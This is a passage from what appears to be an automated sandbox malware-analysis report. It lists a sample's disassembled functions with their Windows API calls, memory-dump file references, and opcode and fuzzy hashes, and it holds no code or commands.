                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 826366716-0
                                    • Opcode ID: cb710a1bcd24072ce309e27d3119ff3cabf08a991c4521f555c4e5c3823ca596
                                    • Instruction ID: 8bb3b38882ddf7819aaacb9171ecac79070269d1b14a782a94d616a8797d7369
                                    • Opcode Fuzzy Hash: cb710a1bcd24072ce309e27d3119ff3cabf08a991c4521f555c4e5c3823ca596
                                    • Instruction Fuzzy Hash: 3361C231208241EFD754DF24C894E2ABBE5FF84318F54855CF4998B2A2DB35ED45CB92
                                    Function 007E8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 007E8BCD
                                    • VariantClear.OLEAUT32 ref: 007E8C3E
                                    • VariantClear.OLEAUT32 ref: 007E8C9D
                                    • VariantClear.OLEAUT32(?), ref: 007E8D10
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 007E8D3B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: 73cfcc7d41e46bc8222cc57fbe3eb571a744bbbc319d578a9f6dfe0f3e7fc389
                                    • Instruction ID: c34462f4ffa9b249deb033087ac772e5210ba9bce9d614d181d66368cee25022
                                    • Opcode Fuzzy Hash: 73cfcc7d41e46bc8222cc57fbe3eb571a744bbbc319d578a9f6dfe0f3e7fc389
                                    • Instruction Fuzzy Hash: 135197B5A01219EFCB10CF29C884AAAB7F9FF8D314B158559E909DB350E734E911CFA0
                                    Function 007F8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 007F8BAE
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 007F8BDA
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 007F8C32
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 007F8C57
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 007F8C5F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String
                                    • String ID:
                                    • API String ID: 2832842796-0
                                    • Opcode ID: eb2a14021a7d7e7ca52105c88e6ebdc2447f2909d2c692303c45385788f3d400
                                    • Instruction ID: 8be01cafb132d217c41c9149c383c8d3e7c5b6b2c8f45ef4e23a2bcbd501c593
                                    • Opcode Fuzzy Hash: eb2a14021a7d7e7ca52105c88e6ebdc2447f2909d2c692303c45385788f3d400
                                    • Instruction Fuzzy Hash: CD515E75A00219DFCB05DF65C884A6DBBF5FF48314F088098E949AB362CB35ED51CBA1
                                    Function 00808EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00808F40
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00808FD0
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00808FEC
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00809032
                                    • FreeLibrary.KERNEL32(00000000), ref: 00809052
                                      • Part of subcall function 0079F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,007F1043,?,753CE610), ref: 0079F6E6
                                      • Part of subcall function 0079F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,007DFA64,00000000,00000000,?,?,007F1043,?,753CE610,?,007DFA64), ref: 0079F70D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                    • String ID:
                                    • API String ID: 666041331-0
                                    • Opcode ID: d659b19230482f27d12998b3417b91e6ef5f7e63ec8154f21a8accfd9f6fe3ea
                                    • Instruction ID: 747c59432d5ee69633c22a8b96be04385a621b55fbe9dc4e6346e5db65c9dd43
                                    • Opcode Fuzzy Hash: d659b19230482f27d12998b3417b91e6ef5f7e63ec8154f21a8accfd9f6fe3ea
                                    • Instruction Fuzzy Hash: E1514E35644205DFC755EF64C884CADBBF1FF49314B0980A8E946AB3A2DB35ED85CB90
                                    Function 00816B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00816C33
                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00816C4A
                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00816C73
                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,007FAB79,00000000,00000000), ref: 00816C98
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00816CC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Long$MessageSendShow
                                    • String ID:
                                    • API String ID: 3688381893-0
                                    • Opcode ID: 2f4bb4b7aa031a29cda181e240f6a41f47c2858a18ba8b4797d0705884eaafb2
                                    • Instruction ID: 01d5a7eb8f37b13116e381aa583f77977ccb0181b70d8cade851aee95a016986
                                    • Opcode Fuzzy Hash: 2f4bb4b7aa031a29cda181e240f6a41f47c2858a18ba8b4797d0705884eaafb2
                                    • Instruction Fuzzy Hash: 89418335604104AFDB248F28CC58FE57BADFF09360F154268E9D9E72A0E371ADA1DA90
                                    Function 007B2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 9ebb6c57e8d7232c1e9263fa6e689faa8e6022f43f5144b9b226ce4af841dade
                                    • Instruction ID: 4e85f5e60d0b57c5e9f9bfca0fbc6e47b958ebd11988a8328d9b69f56d86d066
                                    • Opcode Fuzzy Hash: 9ebb6c57e8d7232c1e9263fa6e689faa8e6022f43f5144b9b226ce4af841dade
                                    • Instruction Fuzzy Hash: A341E272A01204EFCB20DF78C884B9DB7A5EF89310F1545A8E515EB352DB35AD02CB80
                                    Function 0079912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00799141
                                    • ScreenToClient.USER32(00000000,?), ref: 0079915E
                                    • GetAsyncKeyState.USER32(00000001), ref: 00799183
                                    • GetAsyncKeyState.USER32(00000002), ref: 0079919D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: 5c05c642cb16e129f9e78f3df681f3f7ffb248f9a1652a186a15f4ac5f9b7b39
                                    • Instruction ID: 9e7a96e80c3df41cc74180ce2c77d918d651ab5bc8d22dbbca4114f1a03a0d53
                                    • Opcode Fuzzy Hash: 5c05c642cb16e129f9e78f3df681f3f7ffb248f9a1652a186a15f4ac5f9b7b39
                                    • Instruction Fuzzy Hash: C5417F7190851AEBDF099F68D848BEEB775FF45320F20831AE525A22D0D7395950CB91
                                    Function 007F3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetInputState.USER32 ref: 007F38CB
                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 007F3922
                                    • TranslateMessage.USER32(?), ref: 007F394B
                                    • DispatchMessageW.USER32(?), ref: 007F3955
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007F3966
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                    • String ID:
                                    • API String ID: 2256411358-0
                                    • Opcode ID: 4e236b7e3f0ef4f5a57c06c3d3abbdd0335ce3f30b73da922c9ebfc728435037
                                    • Instruction ID: 14cc4e99ef397023518e44a6d528ab11451de7d3ea62bfac595b603a79cc225b
                                    • Opcode Fuzzy Hash: 4e236b7e3f0ef4f5a57c06c3d3abbdd0335ce3f30b73da922c9ebfc728435037
                                    • Instruction Fuzzy Hash: 1431C87054434A9EEF35CB35984CBB67BA8BB05349F04056DD66682390E7FCB684CB21
                                    Function 007FCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 007FCF38
                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 007FCF6F
                                    • GetLastError.KERNEL32(?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFB4
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFC8
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,007FC21E,00000000), ref: 007FCFF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                    • String ID:
                                    • API String ID: 3191363074-0
                                    • Opcode ID: 547d98e466842d1050449419892fcfa290136660a225bb269fe49ae78af736d3
                                    • Instruction ID: 97fe75d72ad7c25d6f52d16196bb593402ba999a30c2f9e6eb9416bbd9ad0aae
                                    • Opcode Fuzzy Hash: 547d98e466842d1050449419892fcfa290136660a225bb269fe49ae78af736d3
                                    • Instruction Fuzzy Hash: A5313C7260420DEFDB21DFA5D9849BABBF9EF14350B10842EE616D2240D738AE419B60
                                    Function 007E1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 007E1915
                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 007E19C1
                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 007E19C9
                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 007E19DA
                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 007E19E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 4cb382cd4ed5eab25d74fa4aa851356f2aeda0bb6b8d9ffdbbe8c0b8b6efcb82
                                    • Instruction ID: 391e857d916d54c544c690df463b14a357b35594f8f7846a68aed57c1e73fae1
                                    • Opcode Fuzzy Hash: 4cb382cd4ed5eab25d74fa4aa851356f2aeda0bb6b8d9ffdbbe8c0b8b6efcb82
                                    • Instruction Fuzzy Hash: 6731B171900299EFCB00CFA9CD99ADE3BB5FF08315F108229F921AB2D1C774A954CB90
                                    Function 00815706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00815745
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0081579D
                                    • _wcslen.LIBCMT ref: 008157AF
                                    • _wcslen.LIBCMT ref: 008157BA
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00815816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen
                                    • String ID:
                                    • API String ID: 763830540-0
                                    • Opcode ID: 4597069910cd137ca6d039c1c2983e2273eba66389818cec963be9642e1b8948
                                    • Instruction ID: a0c5afb4a3dd6e0da1033a128b1f4e9272c25aa4503f04557489fde2d0104486
                                    • Opcode Fuzzy Hash: 4597069910cd137ca6d039c1c2983e2273eba66389818cec963be9642e1b8948
                                    • Instruction Fuzzy Hash: AB21A5B1904618DADB209F64CC85AEE7BBCFF84324F108616E929EA1C0D77099C5CF51
                                    Function 00800930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00800951
                                    • GetForegroundWindow.USER32 ref: 00800968
                                    • GetDC.USER32(00000000), ref: 008009A4
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 008009B0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 008009E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: c0ba7a66334d84f76218ed7a2f8a99dd3e96737c93aee6dc09c91825c3965d68
                                    • Instruction ID: 01ca856eaec3ccf3c047c4b7360b62bbfa92bf6be7a91ab0e7a2e98d2b060b1f
                                    • Opcode Fuzzy Hash: c0ba7a66334d84f76218ed7a2f8a99dd3e96737c93aee6dc09c91825c3965d68
                                    • Instruction Fuzzy Hash: 09216F75A40204EFD704EF69D888AAEBBE9FF48700F04846CE94AD7362CB74AC44CB50
                                    Function 007BCDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 007BCDC6
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007BCDE9
                                      • Part of subcall function 007B3820: RtlAllocateHeap.NTDLL(00000000,?,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6,?,00781129), ref: 007B3852
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 007BCE0F
                                    • _free.LIBCMT ref: 007BCE22
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 007BCE31
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 0087f3baaa8ccf578c95e1fab48d37bc83866ee84785209c9243f08d749d8c23
                                    • Instruction ID: f1e4d1078c866acac49d171436ffa4a7b3ba5d836f6da763bbecea7171c7907e
                                    • Opcode Fuzzy Hash: 0087f3baaa8ccf578c95e1fab48d37bc83866ee84785209c9243f08d749d8c23
                                    • Instruction Fuzzy Hash: 0401AC72601215BF23221A766C4CEFB7A6DEEC6BA1315812DFD05DB201DA69CD0181B0
                                    Function 00799639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                                    Download Yara Rule
                                    APIs
                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00799693
                                    • SelectObject.GDI32(?,00000000), ref: 007996A2
                                    • BeginPath.GDI32(?), ref: 007996B9
                                    • SelectObject.GDI32(?,00000000), ref: 007996E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 8add9507d66094a061643c90d5743ebd58ed8290f16c05a1d91eb3746916fe41
                                    • Instruction ID: ccebb07edff5e89c243afaa1a6462908edcaa10c3f2d1e3b82dff212def6876d
                                    • Opcode Fuzzy Hash: 8add9507d66094a061643c90d5743ebd58ed8290f16c05a1d91eb3746916fe41
                                    • Instruction Fuzzy Hash: 72218E70802305EBEF119F68EC0C7E93FB9BB11366F90421AF611A61B0D3789896CB94
                                    Function 007E5711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: 8130a9ebd0716f57a027d418478d9b99944c6805f8017133639c339da4ec6759
                                    • Instruction ID: 0395001dc78b94ec1290b0d845a8b61869424c17fada55309a0048fd3ce73b4b
                                    • Opcode Fuzzy Hash: 8130a9ebd0716f57a027d418478d9b99944c6805f8017133639c339da4ec6759
                                    • Instruction Fuzzy Hash: 5D01B5A264665DFBE60895129D92FFB735CEF653A8F404120FE14DE242F76CED6082E0
                                    Function 007B2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,007AF2DE,007B3863,00851444,?,0079FDF5,?,?,0078A976,00000010,00851440,007813FC,?,007813C6), ref: 007B2DFD
                                    • _free.LIBCMT ref: 007B2E32
                                    • _free.LIBCMT ref: 007B2E59
                                    • SetLastError.KERNEL32(00000000,00781129), ref: 007B2E66
                                    • SetLastError.KERNEL32(00000000,00781129), ref: 007B2E6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 38609b85ab30fc0217fc290d74179ea4df062b92db8b33c76d7441d183838151
                                    • Instruction ID: f66e5b491132a8e571bdf40024fde31f4b612509159dc81aa709516049457201
                                    • Opcode Fuzzy Hash: 38609b85ab30fc0217fc290d74179ea4df062b92db8b33c76d7441d183838151
                                    • Instruction Fuzzy Hash: B901A436247600B7C61367766C4DFEB266DBFD57A5B254528F825E22A3EE6CCC034520
                                    Function 007E000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?,?,007E035E), ref: 007E002B
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0046
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?,?), ref: 007E0054
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,007DFF41,80070057,?), ref: 007E0064
